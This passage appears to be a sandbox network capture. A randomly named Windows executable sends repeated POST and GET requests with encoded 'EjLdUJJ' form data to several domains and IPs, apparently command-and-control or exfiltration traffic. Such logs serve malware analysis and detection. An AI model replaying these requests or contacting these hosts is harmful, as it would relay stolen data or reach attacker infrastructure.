                                                                                                            Origin: http://www.kovallo.cloud
                                                                                                            Referer: http://www.kovallo.cloud/kmgk/
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
Oct 7, 2024 15:55:30.909902096 CEST | 355 | IN | HTTP/1.1 404 Not Found
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 07 Oct 2024 13:55:30 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Connection: close
                                                                                                            Content-Encoding: gzip


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.9 | 49978 | 81.2.196.19 | 80 | 6568 | C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exe
Timestamp | Bytes transferred | Direction | Data
Oct 7, 2024 15:55:32.822316885 CEST | 1708 | OUT | POST /kmgk/ HTTP/1.1
                                                                                                            Accept: */*
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Accept-Language: en-US,en
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Content-Length: 1232
                                                                                                            Cache-Control: no-cache
                                                                                                            Host: www.kovallo.cloud
                                                                                                            Origin: http://www.kovallo.cloud
                                                                                                            Referer: http://www.kovallo.cloud/kmgk/
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
Oct 7, 2024 15:55:33.441025019 CEST | 355 | IN | HTTP/1.1 404 Not Found
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 07 Oct 2024 13:55:33 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Connection: close
                                                                                                            Content-Encoding: gzip


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.9 | 49979 | 81.2.196.19 | 80 | 6568 | C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exe
Timestamp | Bytes transferred | Direction | Data
Oct 7, 2024 15:55:35.364209890 CEST | 413 | OUT | GET /kmgk/?EjLdUJJ=QukKnG46OQSX7O08sGKvg3RM3X3qAaYvhEJu7ZdGlt3+bssdK2PjljbXjRv2eFs2wJoIh8oMTDRJEFcKnARzRzkSQpK8SApNFtkA5U4MUp6J2Mz6QQ==&WLUDu=SXq8yrvPVd3tf HTTP/1.1
                                                                                                            Accept: */*
                                                                                                            Accept-Language: en-US,en
                                                                                                            Connection: close
                                                                                                            Host: www.kovallo.cloud
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
Oct 7, 2024 15:55:35.985527992 CEST | 691 | IN | HTTP/1.1 404 Not Found
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 07 Oct 2024 13:55:35 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 548
                                                                                                            Connection: close
                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.9 | 49980 | 94.73.146.114 | 80 | 6568 | C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exe
Timestamp | Bytes transferred | Direction | Data
Oct 7, 2024 15:55:41.131969929 CEST | 692 | OUT | POST /becc/ HTTP/1.1
                                                                                                            Accept: */*
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Accept-Language: en-US,en
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Content-Length: 196
                                                                                                            Cache-Control: no-cache
                                                                                                            Host: www.sppsuperplast.online
                                                                                                            Origin: http://www.sppsuperplast.online
                                                                                                            Referer: http://www.sppsuperplast.online/becc/
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.9 | 49981 | 94.73.146.114 | 80 | 6568 | C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exe
Timestamp | Bytes transferred | Direction | Data
Oct 7, 2024 15:55:43.917706013 CEST | 716 | OUT | POST /becc/ HTTP/1.1
                                                                                                            Accept: */*
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Accept-Language: en-US,en
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Content-Length: 220
                                                                                                            Cache-Control: no-cache
                                                                                                            Host: www.sppsuperplast.online
                                                                                                            Origin: http://www.sppsuperplast.online
                                                                                                            Referer: http://www.sppsuperplast.online/becc/
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
Oct 7, 2024 15:55:45.195699930 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                            Connection: close
                                                                                                            x-powered-by: PHP/8.1.29
                                                                                                            expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                            cache-control: no-cache, must-revalidate, max-age=0
                                                                                                            content-type: text/html; charset=UTF-8
                                                                                                            link: <http://sppsuperplast.online/wp-json/>; rel="https://api.w.org/"
                                                                                                            transfer-encoding: chunked
                                                                                                            content-encoding: br
                                                                                                            vary: Accept-Encoding
                                                                                                            date: Mon, 07 Oct 2024 13:55:45 GMT
                                                                                                            server: LiteSpeed


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.9 | 49982 | 94.73.146.114 | 80 | 6568 | C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exe

Timestamp | Bytes transferred | Direction | Data
Oct 7, 2024 15:55:46.541456938 CEST | 1729 | OUT | POST /becc/ HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 1232
Cache-Control: no-cache
Host: www.sppsuperplast.online
Origin: http://www.sppsuperplast.online
Referer: http://www.sppsuperplast.online/becc/
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
Oct 7, 2024 15:55:47.854372978 CEST | 1236 | IN | HTTP/1.1 404 Not Found
Connection: close
x-powered-by: PHP/8.1.29
expires: Wed, 11 Jan 1984 05:00:00 GMT
cache-control: no-cache, must-revalidate, max-age=0
content-type: text/html; charset=UTF-8
link: <http://sppsuperplast.online/wp-json/>; rel="https://api.w.org/"
transfer-encoding: chunked
content-encoding: br
vary: Accept-Encoding
date: Mon, 07 Oct 2024 13:55:47 GMT
server: LiteSpeed


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.9 | 49983 | 94.73.146.114 | 80 | 6568 | C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exe

Timestamp | Bytes transferred | Direction | Data
Oct 7, 2024 15:55:49.086323023 CEST | 420 | OUT | GET /becc/?EjLdUJJ=NMCgl399tF1pJwA6An/WBP0ajP560ZE7ZZq+0r9zHfOkYA3BHmcUXc8X+6X2iixUCsZsuiX+6YOVLq03j5m1hpFW51KlNbBS8GqvLsVmQjui7pqzBw==&WLUDu=SXq8yrvPVd3tf HTTP/1.1
Accept: */*
Accept-Language: en-US,en
Connection: close
Host: www.sppsuperplast.online
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
Oct 7, 2024 15:55:50.373863935 CEST | 503 | IN | HTTP/1.1 301 Moved Permanently
Connection: close
x-powered-by: PHP/8.1.29
expires: Wed, 11 Jan 1984 05:00:00 GMT
cache-control: no-cache, must-revalidate, max-age=0
content-type: text/html; charset=UTF-8
x-redirect-by: WordPress
location: http://sppsuperplast.online/becc/?EjLdUJJ=NMCgl399tF1pJwA6An/WBP0ajP560ZE7ZZq+0r9zHfOkYA3BHmcUXc8X+6X2iixUCsZsuiX+6YOVLq03j5m1hpFW51KlNbBS8GqvLsVmQjui7pqzBw==&WLUDu=SXq8yrvPVd3tf
content-length: 0
date: Mon, 07 Oct 2024 13:55:50 GMT
server: LiteSpeed


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.9 | 49984 | 3.33.130.190 | 80 | 6568 | C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exe

Timestamp | Bytes transferred | Direction | Data
Oct 7, 2024 15:55:55.424530983 CEST | 662 | OUT | POST /fl4z/ HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 196
Cache-Control: no-cache
Host: www.tracy.club
Origin: http://www.tracy.club
Referer: http://www.tracy.club/fl4z/
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.9 | 49985 | 3.33.130.190 | 80 | 6568 | C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exe

Timestamp | Bytes transferred | Direction | Data
Oct 7, 2024 15:55:58.306138992 CEST | 686 | OUT | POST /fl4z/ HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 220
Cache-Control: no-cache
Host: www.tracy.club
Origin: http://www.tracy.club
Referer: http://www.tracy.club/fl4z/
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.9 | 49986 | 3.33.130.190 | 80 | 6568 | C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exe

Timestamp | Bytes transferred | Direction | Data
Oct 7, 2024 15:56:00.865958929 CEST | 1699 | OUT | POST /fl4z/ HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 1232
Cache-Control: no-cache
Host: www.tracy.club
Origin: http://www.tracy.club
Referer: http://www.tracy.club/fl4z/
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
                                                                                                            Data Ascii: EjLdUJJ= [TRUNCATED]


                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                            12 | 192.168.2.9 | 49987 | 3.33.130.190 | 80 | 6568 | C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exe
                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                            Oct 7, 2024 15:56:03.511662006 CEST | 410 | OUT | GET /fl4z/?EjLdUJJ=jN3KkN8xc9fseqtyr4X8nJfH94tzQs+avQjwnfoXfZkRaIXL2JZC0r1JTtOX041q/8MEGRSGOm2xSpEpVpIzcp1KqIPIBJlEGfbNZZvmCXWpEmY6ZQ==&WLUDu=SXq8yrvPVd3tf HTTP/1.1
                                                                                                            Accept: */*
                                                                                                            Accept-Language: en-US,en
                                                                                                            Connection: close
                                                                                                            Host: www.tracy.club
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
                                                                                                            Oct 7, 2024 15:56:06.821060896 CEST | 399 | IN | HTTP/1.1 200 OK
                                                                                                            Server: openresty
                                                                                                            Date: Mon, 07 Oct 2024 13:56:06 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 259
                                                                                                            Connection: close
                                                                                                            Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?EjLdUJJ=jN3KkN8xc9fseqtyr4X8nJfH94tzQs+avQjwnfoXfZkRaIXL2JZC0r1JTtOX041q/8MEGRSGOm2xSpEpVpIzcp1KqIPIBJlEGfbNZZvmCXWpEmY6ZQ==&WLUDu=SXq8yrvPVd3tf"}</script></head></html>


                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                            13 | 192.168.2.9 | 49988 | 209.74.95.29 | 80 | 6568 | C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exe
                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                            Oct 7, 2024 15:56:11.882992983 CEST | 665 | OUT | POST /ha8h/ HTTP/1.1
                                                                                                            Accept: */*
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Accept-Language: en-US,en
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Content-Length: 196
                                                                                                            Cache-Control: no-cache
                                                                                                            Host: www.sterkus.xyz
                                                                                                            Origin: http://www.sterkus.xyz
                                                                                                            Referer: http://www.sterkus.xyz/ha8h/
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
                                                                                                            Data Ascii: EjLdUJJ=CZZgZ8wRGz3hYt1ArIMYoF+sWvEdYpYVXoE4be4560yoiMJ5wQDRNAvHUIPxlChzgrdQG5+m5+ZPWBGCMVvu+gYY/TyYFLEvrsUfFPpR3ShoVH+nUwMBi6QUOr6ysnD9TkrX5mTbdkWrVB2/ZPYhMm/IvihQKKMugdJCwB/wfg3D+5m0I6QaONkPogIC
                                                                                                            Oct 7, 2024 15:56:12.438560963 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                            Date: Mon, 07 Oct 2024 13:56:12 GMT
                                                                                                            Server: Apache
                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                            Content-Length: 13928
                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                            Connection: close
                                                                                                            Content-Type: text/html
                                                                                                            Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <title>Makaan - Real Estate HTML Template</title> <meta content="width=device-width, initial-scale=1.0" name="viewport"> <meta content="" name="keywords"> <meta content="" name="description"> ... Favicon --> <link href="img/favicon.ico" rel="icon"> ... Google Web Fonts --> <link rel="preconnect" href="https://fonts.googleapis.com"> <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin> <link href="https://fonts.googleapis.com/css2?family=Heebo:wght@400;500;600&family=Inter:wght@700;800&display=swap" rel="stylesheet"> ... Icon Font Stylesheet --> <link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.10.0/css/all.min.css" rel="stylesheet"> <link href="https://cdn.jsdelivr.net/npm/bootstrap-icons@1.4.1/font/bootstrap-icons.css" rel="stylesheet"> ... Libraries Stylesheet --> <link href="lib/animate/animate.min.css" [TRUNCATED]


                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                            14 | 192.168.2.9 | 49989 | 209.74.95.29 | 80 | 6568 | C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exe
                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                            Oct 7, 2024 15:56:14.433418989 CEST | 689 | OUT | POST /ha8h/ HTTP/1.1
                                                                                                            Accept: */*
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Accept-Language: en-US,en
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Content-Length: 220
                                                                                                            Cache-Control: no-cache
                                                                                                            Host: www.sterkus.xyz
                                                                                                            Origin: http://www.sterkus.xyz
                                                                                                            Referer: http://www.sterkus.xyz/ha8h/
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
                                                                                                            Data Ascii: EjLdUJJ=CZZgZ8wRGz3hZNFApvQYgF+vaPEdXJYRXo44bfMX6Cqoit55zU3RKAvHM4O5rih4grRiG96m5+NPWFOCNiDp/wYe0zyaY7EvrsUfFLAG3TFoV3inVRMC5aQbJr6y6XD5Tkr55jy2diSrVEK/Z+YiFm/OgCgQCJxGrttayyvHMR715YGqZIZBbakovHBqVrKGsXQ4dk0VzL5P9OF3gQ==
                                                                                                            Oct 7, 2024 15:56:15.161350012 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                            Date: Mon, 07 Oct 2024 13:56:15 GMT
                                                                                                            Server: Apache
                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                            Content-Length: 13928
                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                            Connection: close
                                                                                                            Content-Type: text/html
                                                                                                            Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <title>Makaan - Real Estate HTML Template</title> <meta content="width=device-width, initial-scale=1.0" name="viewport"> <meta content="" name="keywords"> <meta content="" name="description"> ... Favicon --> <link href="img/favicon.ico" rel="icon"> ... Google Web Fonts --> <link rel="preconnect" href="https://fonts.googleapis.com"> <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin> <link href="https://fonts.googleapis.com/css2?family=Heebo:wght@400;500;600&family=Inter:wght@700;800&display=swap" rel="stylesheet"> ... Icon Font Stylesheet --> <link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.10.0/css/all.min.css" rel="stylesheet"> <link href="https://cdn.jsdelivr.net/npm/bootstrap-icons@1.4.1/font/bootstrap-icons.css" rel="stylesheet"> ... Libraries Stylesheet --> <link href="lib/animate/animate.min.css" [TRUNCATED]


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.9 | 49990 | 209.74.95.29 | 80 | 6568 | C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exe
Timestamp | Bytes transferred | Direction | Data
Oct 7, 2024 15:56:17.271444082 CEST | 1702 | OUT | POST /ha8h/ HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 1232
Cache-Control: no-cache
Host: www.sterkus.xyz
Origin: http://www.sterkus.xyz
Referer: http://www.sterkus.xyz/ha8h/
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
Oct 7, 2024 15:56:18.213613987 CEST | 1236 | IN | HTTP/1.1 404 Not Found
Date: Mon, 07 Oct 2024 13:56:17 GMT
Server: Apache
X-Frame-Options: SAMEORIGIN
Content-Length: 13928
X-XSS-Protection: 1; mode=block
Connection: close
Content-Type: text/html
Oct 7, 2024 15:56:18.213973999 CEST | 1236 | IN | HTTP/1.1 404 Not Found
Date: Mon, 07 Oct 2024 13:56:17 GMT
Server: Apache
X-Frame-Options: SAMEORIGIN
Content-Length: 13928
X-XSS-Protection: 1; mode=block
Connection: close
Content-Type: text/html


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.9 | 49991 | 209.74.95.29 | 80 | 6568 | C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exe
Timestamp | Bytes transferred | Direction | Data
Oct 7, 2024 15:56:19.803411007 CEST | 411 | OUT | GET /ha8h/?WLUDu=SXq8yrvPVd3tf&EjLdUJJ=PbxAaK8rSTbGZ+BUjIA4k1uuUYM0d40nW5ERHNgbkCm+3sg74DzBCze1WsCQlDZBoOF+IY6Xn812UFXfTFX6/3MPvQCQPMFuzfo+VK5cq25Wd2+yKQ== HTTP/1.1
Accept: */*
Accept-Language: en-US,en
Connection: close
Host: www.sterkus.xyz
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
Oct 7, 2024 15:56:20.385941982 CEST | 1236 | IN | HTTP/1.1 404 Not Found
Date: Mon, 07 Oct 2024 13:56:20 GMT
Server: Apache
X-Frame-Options: SAMEORIGIN
Content-Length: 13928
X-XSS-Protection: 1; mode=block
Connection: close
Content-Type: text/html; charset=utf-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.9 | 49992 | 15.197.172.60 | 80 | 6568 | C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exe
Timestamp | Bytes transferred | Direction | Data
Oct 7, 2024 15:56:25.727608919 CEST | 671 | OUT | POST /xx1z/ HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 196
Cache-Control: no-cache
Host: www.syncnodex.net
Origin: http://www.syncnodex.net
Referer: http://www.syncnodex.net/xx1z/
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
                                                                                                            Data Ascii: EjLdUJJ=YSeb04MEpdQKQ+NzEUPQXL/lG1TNj5fQhezEn8T5+s0zPNjqJ4IHCa1h1IIYIc6kI8H5pl7kE5u/bEAyLt6deAG30H9vrgpBz41UL7FqrweK54M2XGfZ4nxKBIHrvookVcTyudOkcdWjdMp3lC2UuNsFzDLQKSn//C5axbUKX1sNuEjqpGe500xXCpfC


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.2.9 | 49993 | 15.197.172.60 | 80 | 6568 | C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exe
Timestamp | Bytes transferred | Direction | Data
Oct 7, 2024 15:56:28.278872967 CEST | 695 | OUT | POST /xx1z/ HTTP/1.1
                                                                                                            Accept: */*
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Accept-Language: en-US,en
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Content-Length: 220
                                                                                                            Cache-Control: no-cache
                                                                                                            Host: www.syncnodex.net
                                                                                                            Origin: http://www.syncnodex.net
                                                                                                            Referer: http://www.syncnodex.net/xx1z/
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
                                                                                                            Data Ascii: EjLdUJJ=YSeb04MEpdQKWe9zCzjQWr/malTNqZfUhe/En/fp+fQzBP7qI6gHBa1h6oIXMc6/I8KEpkXkE56/bB8yLaueeQG1yH9tvgpBz41UL7BUrwGK5Ic2WnfG2HxFGIHrroogVcTQuYmecf+jdNZ3kXaTnNsD9jKTGHSuxj17/rUqLWgkgFD040XihjxwFOWquXkOleaq9bD8K7Hgmocyow==


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.2.9 | 49994 | 15.197.172.60 | 80 | 6568 | C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exe
Timestamp | Bytes transferred | Direction | Data
Oct 7, 2024 15:56:31.043647051 CEST | 1708 | OUT | POST /xx1z/ HTTP/1.1
                                                                                                            Accept: */*
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Accept-Language: en-US,en
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Content-Length: 1232
                                                                                                            Cache-Control: no-cache
                                                                                                            Host: www.syncnodex.net
                                                                                                            Origin: http://www.syncnodex.net
                                                                                                            Referer: http://www.syncnodex.net/xx1z/
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
Data Ascii: EjLdUJJ= [TRUNCATED]


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
20 | 192.168.2.9 | 49995 | 15.197.172.60 | 80 | 6568 | C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exe
Timestamp | Bytes transferred | Direction | Data
Oct 7, 2024 15:56:33.593826056 CEST | 413 | OUT | GET /xx1z/?EjLdUJJ=VQ273Por9tZNXcpnBjHyerHfPh3IuY3S8eL22/fuso5dBdPYMoEWGed6+bFxO5C9LYS/pyvuVKWKURQ6ZaqIRBLVhXVMqm8ByJItQpJ18i+00NseLA==&WLUDu=SXq8yrvPVd3tf HTTP/1.1
                                                                                                            Accept: */*
                                                                                                            Accept-Language: en-US,en
                                                                                                            Connection: close
                                                                                                            Host: www.syncnodex.net
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
Oct 7, 2024 15:56:34.021588087 CEST | 399 | IN | HTTP/1.1 200 OK
                                                                                                            Server: openresty
                                                                                                            Date: Mon, 07 Oct 2024 13:56:33 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 259
                                                                                                            Connection: close
                                                                                                            Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?EjLdUJJ=VQ273Por9tZNXcpnBjHyerHfPh3IuY3S8eL22/fuso5dBdPYMoEWGed6+bFxO5C9LYS/pyvuVKWKURQ6ZaqIRBLVhXVMqm8ByJItQpJ18i+00NseLA==&WLUDu=SXq8yrvPVd3tf"}</script></head></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
21 | 192.168.2.9 | 49996 | 46.17.172.49 | 80 | 6568 | C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exe
Timestamp | Bytes transferred | Direction | Data
Oct 7, 2024 15:56:39.587677956 CEST | 689 | OUT | POST /lbpf/ HTTP/1.1
                                                                                                            Accept: */*
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Accept-Language: en-US,en
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Content-Length: 196
                                                                                                            Cache-Control: no-cache
                                                                                                            Host: www.galaxyslot88rtp.lat
                                                                                                            Origin: http://www.galaxyslot88rtp.lat
                                                                                                            Referer: http://www.galaxyslot88rtp.lat/lbpf/
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
                                                                                                            Data Ascii: EjLdUJJ=B8r/v0PfZmCZHZFXy3tBwmHYWO0bhbg+cnTkDF1UujCFvfgqsx/mcYsWY+C49WRe8nCqMaGr9ezySbBlW1Kx7/WAYsL7Z1hfxXqQLePGP4v/h0ECjGt/PTC6LwNYgDWkNlwKyxSRSmhTF69vEwKIOSEMaiFjZULFyTamTQEu1l3jimKWfWSrbSx1oXjc
Oct 7, 2024 15:56:40.507422924 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                            Connection: close
